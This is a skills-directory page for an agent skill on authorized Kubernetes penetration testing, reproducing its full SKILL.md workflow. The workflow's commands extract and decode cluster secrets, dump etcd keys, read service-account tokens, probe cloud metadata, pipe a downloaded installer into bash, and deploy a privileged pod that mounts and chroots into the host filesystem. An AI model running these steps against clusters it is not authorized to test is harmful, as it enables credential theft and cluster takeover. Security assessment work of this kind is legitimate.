Agent skill

Performing Kubernetes Penetration Testing

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Evaluates Kubernetes cluster security by actively simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policy, and secrets, using kube-hunter, Kubescape…

Apache-2.0Auto-check passedDevOps & Cloud

Install Performing Kubernetes Penetration Testing

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-kubernetes-penetration-testing -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills performing-kubernetes-penetration-testing --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/performing-kubernetes-penetration-testing .claude/skills/performing-kubernetes-penetration-testing && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
performing-kubernetes-penetration-testing
GitHub stars
34k
Token cost
~2.2k tokens
SKILL.md length
284 words
Files
8 (incl. scripts, references, assets)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Evaluates Kubernetes cluster security by actively simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policy, and secrets, using kube-hunter, Kubescape…

  • Works in 8 steps: External Reconnaissance → Automated Scanning with kube-hunter → CIS Benchmark Assessment with kube-bench → …
  • An authorized penetration test
  • SKILL.md covers Overview, When to Use, Prerequisites and Core Concepts, plus 3 more sections
  • Runs Python scripts from its folder; calls kubectl, curl and jq; reaches target-cluster.com and raw.githubusercontent.com

What it does

Performing Kubernetes Penetration Testing is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Evaluates Kubernetes cluster security by actively simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policy, and secrets, using kube-hunter, Kubescape, peirates, and manual kubectl exploitation to find paths to cluster compromise. Use for an authorized penetration test or hands-on validation that controls actually stop an attacker. Keywords: kube-hunter, Kubescape, peirates, kubelet 10250, anonymous auth, token theft, lateral movement, cluster takeover. Do not use for a…

Its SKILL.md is about 2.2k tokens, which your agent loads only when the skill is triggered. The skill folder holds 10 other files, including scripts, reference files and assets (for example `assets/template.md`, `references/api-reference.md` and `references/standards.md`).

It sits in DevOps & Cloud, covering Container orchestration, Penetration testing and Authorization and RBAC. It works with Kubernetes. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • An authorized penetration test
  • Hands-on validation that controls actually stop an attacker
  • A configuration-only compliance audit - use performing-kubernetes-cis-benchmark-with-kube-bench

Example prompts

  • “Use the performing-kubernetes-penetration-testing skill to evaluate Kubernetes cluster security by actively simulating attacker techniques against…”
  • “/performing-kubernetes-penetration-testing”

Requirements

  • Python 3

Workflow steps

8 steps, taken from the step headings in SKILL.md.

  1. External Reconnaissance
  2. Automated Scanning with kube-hunter
  3. CIS Benchmark Assessment with kube-bench
  4. Framework Compliance with Kubescape
  5. RBAC Exploitation Testing
  6. Secret Extraction Testing
  7. Pod Exploitation
  8. Network Policy Testing

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 2 files in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • kubectl
    • curl
    • jq
    • pip
    • bash

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • target-cluster.com
    • raw.githubusercontent.com
    • kubernetes.default.svc
    • target-service.namespace.svc

    Also links to:

    • github.com
    • attack.mitre.org
    • microsoft.github.io

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Performing Kubernetes Penetration Testing loads about 2.2k tokens when it runs, and up to ~3.7k if it reads all its reference files. Until then it costs about 163 tokens; SKILL.md has 284 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~163
When it runs · the whole SKILL.md, loaded when a task matches
~2.2k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.7k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 284 words, ~2,195 tokens.

Download SKILL.mdSave it as .claude/skills/performing-kubernetes-penetration-testing/SKILL.md (or your agent's skills folder). This skill also uses 7 other files; get the full folder from GitHub.
name
performing-kubernetes-penetration-testing
description
Evaluates Kubernetes cluster security by actively simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policy, and secrets, using kube-hunter, Kubescape, peirates, and manual kubectl exploitation to find paths to cluster compromise. Use for an authorized penetration test or hands-on validation that controls actually stop an attacker. Keywords: kube-hunter, Kubescape, peirates, kubelet 10250, anonymous auth, token theft, lateral movement, cluster takeover. Do not use for a configuration-only compliance audit - use performing-kubernetes-cis-benchmark-with-kube-bench.
domain
cybersecurity
subdomain
container-security
tags
containers, kubernetes, security, penetration-testing, offensive-security
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.PS-01, PR.IR-01, ID.AM-08, DE.CM-01
mitre_attack
T1610, T1611, T1609, T1525

Performing Kubernetes Penetration Testing

Overview

Kubernetes penetration testing systematically evaluates cluster security by simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policies, and secrets. Using tools like kube-hunter, Kubescape, peirates, and manual kubectl exploitation, testers identify misconfigurations that could lead to cluster compromise.

When to Use

  • When conducting security assessments that involve performing kubernetes penetration testing
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Authorized penetration testing engagement
  • Kubernetes cluster access (various levels for different test scenarios)
  • kube-hunter, kubescape, kube-bench installed
  • kubectl configured
  • Network access to cluster components

Core Concepts

Kubernetes Attack Surface
ComponentPortAttack Vectors
API Server6443Auth bypass, RBAC abuse, anonymous access
Kubelet10250/10255Unauthenticated access, command execution
etcd2379/2380Unauthenticated read, secret extraction
Dashboard8443Default credentials, token theft
NodePort Services30000-32767Service exposure, application exploits
CoreDNS53DNS spoofing, zone transfer
MITRE ATT&CK for Kubernetes
PhaseTechniques
Initial AccessExposed Dashboard, Kubeconfig theft, Application exploit
Executionexec into container, CronJob, deploy privileged pod
PersistenceBackdoor container, mutating webhook, static pod
Privilege EscalationPrivileged container, node access, RBAC abuse
Defense EvasionPod name mimicry, namespace hiding, log deletion
Credential AccessSecret extraction, service account token theft
Lateral MovementContainer escape, cluster internal services

Workflow

Step 1: External Reconnaissance
bash
# Discover Kubernetes services
nmap -sV -p 443,6443,8443,2379,10250,10255,30000-32767 target-cluster.com

# Check for exposed API server
curl -k https://target-cluster.com:6443/api
curl -k https://target-cluster.com:6443/version

# Check anonymous authentication
curl -k https://target-cluster.com:6443/api/v1/namespaces

# Check for exposed kubelet
curl -k https://node-ip:10250/pods
curl http://node-ip:10255/pods  # Read-only kubelet
Step 2: Automated Scanning with kube-hunter
bash
# Install kube-hunter
pip install kube-hunter

# Remote scan
kube-hunter --remote target-cluster.com

# Internal network scan (from within cluster)
kube-hunter --internal

# Pod scan (from within a pod)
kube-hunter --pod

# Generate report
kube-hunter --remote target-cluster.com --report json --log output.json
Step 3: CIS Benchmark Assessment with kube-bench
bash
# Run kube-bench on master node
kube-bench run --targets master

# Run on worker node
kube-bench run --targets node

# Check specific sections
kube-bench run --targets master --check 1.2.1,1.2.2,1.2.3

# JSON output
kube-bench run --json > kube-bench-results.json

# Run as Kubernetes job
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml
kubectl logs -l app=kube-bench
Step 4: Framework Compliance with Kubescape
bash
# Install kubescape
curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

# Scan against NSA/CISA hardening guide
kubescape scan framework nsa

# Scan against MITRE ATT&CK
kubescape scan framework mitre

# Scan against CIS Kubernetes Benchmark
kubescape scan framework cis-v1.23-t1.0.1

# Scan specific namespace
kubescape scan framework nsa --namespace production

# JSON output
kubescape scan framework nsa --format json --output kubescape-report.json
Step 5: RBAC Exploitation Testing
bash
# Check current permissions
kubectl auth can-i --list

# Check specific high-value permissions
kubectl auth can-i create pods
kubectl auth can-i create pods --subresource=exec
kubectl auth can-i get secrets
kubectl auth can-i create clusterrolebindings
kubectl auth can-i '*' '*'  # cluster-admin check

# Enumerate service account tokens
kubectl get serviceaccounts -A
kubectl get secrets -A -o json | jq '.items[] | select(.type=="kubernetes.io/service-account-token") | {name: .metadata.name, namespace: .metadata.namespace}'

# Check for overly permissive roles
kubectl get clusterrolebindings -o json | jq '.items[] | select(.subjects[]?.name=="system:anonymous" or .subjects[]?.name=="system:unauthenticated")'

# Test service account impersonation
kubectl --as=system:serviceaccount:default:default get pods
Step 6: Secret Extraction Testing
bash
# List all secrets
kubectl get secrets -A

# Extract specific secret
kubectl get secret db-credentials -o jsonpath='{.data.password}' | base64 -d

# Check for secrets in environment variables
kubectl get pods -A -o json | jq '.items[].spec.containers[].env[]? | select(.valueFrom.secretKeyRef)'

# Check for secrets in mounted volumes
kubectl get pods -A -o json | jq '.items[].spec.volumes[]? | select(.secret)'

# Search etcd directly (if accessible)
ETCDCTL_API=3 etcdctl --endpoints=https://etcd-ip:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix --keys-only
Step 7: Pod Exploitation
bash
# Deploy test pod with elevated privileges
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: pentest-pod
  namespace: default
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: pentest
    image: ubuntu:22.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF

# Exec into pod
kubectl exec -it pentest-pod -- bash

# From inside privileged pod - access host filesystem
chroot /host

# From inside any pod - check internal services
curl -k https://kubernetes.default.svc/api/v1/namespaces
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Step 8: Network Policy Testing
bash
# Check for network policies
kubectl get networkpolicies -A

# Test pod-to-pod communication (should be blocked by policies)
kubectl run test-netpol --image=busybox --restart=Never -- wget -qO- --timeout=2 http://target-service.namespace.svc

# Test egress to external services
kubectl run test-egress --image=busybox --restart=Never -- wget -qO- --timeout=2 http://example.com

# Test access to metadata service (cloud environments)
kubectl run test-metadata --image=busybox --restart=Never -- wget -qO- --timeout=2 http://169.254.169.254/latest/meta-data/

Validation Commands

bash
# Verify kube-hunter findings
kube-hunter --remote $CLUSTER_IP --report json

# Cross-validate with Kubescape
kubescape scan framework nsa --format json

# Check remediation effectiveness
kube-bench run --targets master,node --json

# Clean up pentest resources
kubectl delete pod pentest-pod
kubectl delete pod test-netpol test-egress test-metadata

References

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 7 other files (scripts, references, assets) in skills/performing-kubernetes-penetration-testing of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • assets/template.md
  • references/api-reference.md
  • references/standards.md
  • references/workflows.md
  • scripts/agent.py
  • scripts/process.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Performing Kubernetes Penetration Testing next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Performing Kubernetes Penetration Testing compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Performing Kubernetes Penetration Testing this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.2kAutomated safety check: PassApache-2.0
Cloud AuditCommonHuman-Lab/nyxstrike157—~1.1kAutomated safety check: PassCustom licence
Operate Kubernetes Toolchaincyberful/cyberful135—~898Automated safety check: PassAGPL-3.0
Kubernetes SpecialistJeffallan/claude-skills12k1 repos~2.1kAutomated safety check: PassMIT
Azure Bastion Jitvinayaklatthe/microsoft-security-skills175—~2.2kAutomated safety check: PassMIT
Container Securityhardw00t/ai-security-arsenal105—~2.8kAutomated safety check: PassNone

Similar skills

  • Cloud Audit

    CommonHuman-Lab/nyxstrike

    Cloud and container security auditing workflow using prowler, trivy, kube-hunter, and docker-bench for AWS, GCP, Azure, Kubernetes, and container images

    157 GitHub stars~1.1k tokensUpdated today
    DevOps & CloudAuto-check passed
  • Operate kubectl, kube-bench, Trivy, Prowler, and manifest/runtime evidence for advanced Kubernetes security assessment.

    135 GitHub stars~898 tokensUpdated 1 mo ago
    DevOps & CloudAuto-check passed
  • Kubernetes Specialist

    Jeffallan/claude-skills

    Creates and checks Kubernetes manifests, Helm charts, RBAC and network policies, and helps debug pod problems, with kubectl checks and rollback steps.

    12k GitHub starsUsed in 1 repo~2.1k tokens
    DevOps & CloudAuto-check passed
  • Azure Bastion Jit

    vinayaklatthe/microsoft-security-skills

    Guidance for secure remote VM management in Azure using Azure Bastion combined with Defender for Cloud just-in-time (JIT) VM access.

    175 GitHub stars~2.2k tokensUpdated 3 mo ago
    DevOps & CloudAuto-check passed
  • Container Security

    hardw00t/ai-security-arsenal

    Container and Kubernetes security assessment — image vulnerability scanning, SBOM diff analysis, K8s cluster auditing, RBAC privilege mapping, NetworkPolicy review, container escape testing, and…

    105 GitHub stars~2.8k tokensUpdated 5 mo ago
    SecurityAuto-check passed
  • Defending Kubernetes

    trilwu/secskills

    Harden and monitor a Kubernetes cluster against the attacks that actually happen — RBAC least privilege and escalation paths, Pod Security Admission enforcement, network policy default-deny, secrets…

    157 GitHub stars~2.2k tokensUpdated 1 mo ago
    DevOps & CloudAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Questions about Performing Kubernetes Penetration Testing

What does Performing Kubernetes Penetration Testing do?

Evaluates Kubernetes cluster security by actively simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policy, and secrets, using kube-hunter, Kubescape…. Performing Kubernetes Penetration Testing is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Evaluates Kubernetes cluster security by actively simulating attacker techniques against the API server, kubelet, etcd, pods, RBAC, network policy, and secrets, using kube-hunter, Kubescape, peirates, and manual kubectl exploitation to find paths to cluster compromise.

When should I use Performing Kubernetes Penetration Testing?

Performing Kubernetes Penetration Testing fits situations like: an authorized penetration test; hands-on validation that controls actually stop an attacker; A configuration-only compliance audit - use performing-kubernetes-cis-benchmark-with-kube-bench.

How do I install Performing Kubernetes Penetration Testing in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-kubernetes-penetration-testing -a claude-code`. Or copy the skill folder (skills/performing-kubernetes-penetration-testing in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/performing-kubernetes-penetration-testing in your project. Claude Code loads it when a task matches its description.

How do I install Performing Kubernetes Penetration Testing in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-kubernetes-penetration-testing -a codex`. Or copy the skill folder (skills/performing-kubernetes-penetration-testing in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/performing-kubernetes-penetration-testing in your project. Codex loads it when a task matches its description.

Can I use Performing Kubernetes Penetration Testing in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-kubernetes-penetration-testing -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/performing-kubernetes-penetration-testing, .gemini/skills/performing-kubernetes-penetration-testing, .github/skills/performing-kubernetes-penetration-testing and .opencode/skills/performing-kubernetes-penetration-testing in your project.

What does Performing Kubernetes Penetration Testing need to run?

Going by SKILL.md and its folder, Performing Kubernetes Penetration Testing needs Python for the scripts in its folder and the command-line tools its instructions call (kubectl, curl, jq, pip and bash). Our summary lists: Python 3.

Does Performing Kubernetes Penetration Testing access the network?

SKILL.md names 7 domains. In commands or code: target-cluster.com, raw.githubusercontent.com, kubernetes.default.svc and target-service.namespace.svc; the agent is likely to contact these when it follows the instructions. As links in the text: github.com, attack.mitre.org and microsoft.github.io. This is read from the text; nothing was executed.

Is Performing Kubernetes Penetration Testing safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Performing Kubernetes Penetration Testing use?

Performing Kubernetes Penetration Testing is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Performing Kubernetes Penetration Testing use?

About 2.2k tokens (SKILL.md is roughly 8.8k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.5k tokens, read only when the agent opens those files.

What are the alternatives to Performing Kubernetes Penetration Testing?

Skills that share tags, products or a category with Performing Kubernetes Penetration Testing: Cloud Audit (CommonHuman-Lab/nyxstrike, 157 stars), Operate Kubernetes Toolchain (cyberful/cyberful, 135 stars), Kubernetes Specialist (Jeffallan/claude-skills, 12k stars) and Azure Bastion Jit (vinayaklatthe/microsoft-security-skills, 175 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Performing Kubernetes Penetration Testing?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.